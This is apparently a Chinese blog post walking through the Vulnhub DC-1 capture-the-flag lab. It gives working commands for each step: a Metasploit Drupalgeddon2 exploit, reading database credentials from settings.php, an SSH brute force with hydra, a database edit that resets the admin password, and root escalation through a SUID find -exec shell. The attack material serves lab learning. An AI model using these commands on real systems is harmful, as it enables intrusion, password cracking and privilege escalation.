Vulnhub DC-1靶机渗透学习1
前言
同学推荐了Vulnhub DC-1靶机,所以就拿来一起学习一下,结果整个过程都是看着别人的writeup走下来的,学艺不精,不过这个过程也认识到,学会了很多东西。记录一下
.下载
地址https://www.vulnhub.com/entry/dc-1-1,292/
个人下的种子,迅雷再下(自己搞的时候,下的确实有点慢)
自己用久了VMware,不想再折腾,直接打开就好,找到路径,然后根据自己设备,简单配置一下
2.开始
打开虚拟机后。提示需要账号密码
看到下图,就是第一关的渗透过程了
需要你自己去找的
于是打开kali,vmware的网络配置使用桥接网络,用 arp-scan -l
扫描
192.168.0.119就是靶机地址了,打开
这里推荐一个chrome插件,叫wappalyzer,这个可以检测网站的信息,cms,框架,服务器等等,非常棒。通过这个插件,可以得知这个网站使用的是drupalCMS
在msf中查找对应的信息,先输入msfconsole
再search drupal
用第5个,先
set rhosts 192.168.124.76
然后use exploit/unix/webapp/drupal_drupalgeddon2
再exploit
当提示session1 open时,则已经成功进入了
执行命令shell命令获得shell
输入ls
有给flag1.txt的文件,打开看一下
cat flag1.txt
翻译,每一个好的CMS都需要一个配置文件,你也一样。
找到这个CMS的配置文件(google)
cd sites/default
cat settings.php
看到了flag2
再翻译翻译
蛮力和字典攻击不是
只有获得访问的方法(您将需要访问)。
你能用这些凭证做什么?
意思是让我不要用暴力破解得方法搞密码?maybe
同时,下面有数据库账号密码
dbuser R0ck3t
直到现在还没有拿到登陆的账号密码
这边进入/etc/passwd看一下
看到有个叫flag4的账号,如何用john +hydra试着暴力破解一下
hydra是kali自带的,john需要自己安装,我的kali好像自带,这个网上去找教程,这里不放出来了
新建标签页
注意:这里的password.lst路径,一定要看清,找对位置
hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.0.119
-l 指定用户名
-P 加载密码字典(这里使用了John the Ripper安装后提供的密码本,一般在john-1.8.0/run/password.lst)
ssh://ip 指定使用协议和ip地址
然后密码就出来了
在vm上的DC-1上登录
也可以用kalissh远程登陆(推荐用这个)
ssh flag4@192.168.0.103
然后登陆mysql
mysql -u dbuser -p
查数据库,使用drupaldb表
查users表
修改admin用户的密码,更新为新密码:123456
登录上去了,查看到了flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
在flag4中提示在root根目录下存在,进入到root根目录/root下找到thefinalflag.txt文本文件
但是,没有提权到root
现在提权
找到一个属于root的有s权限的文件
提权命令: find / -perm -u=s -type f 2>/dev/null
find test -exec '/bin/sh' \;
提取成功 !!开心!
下面是之前的操作,操作更加自由
root目录下还有最终的flag
告一段落!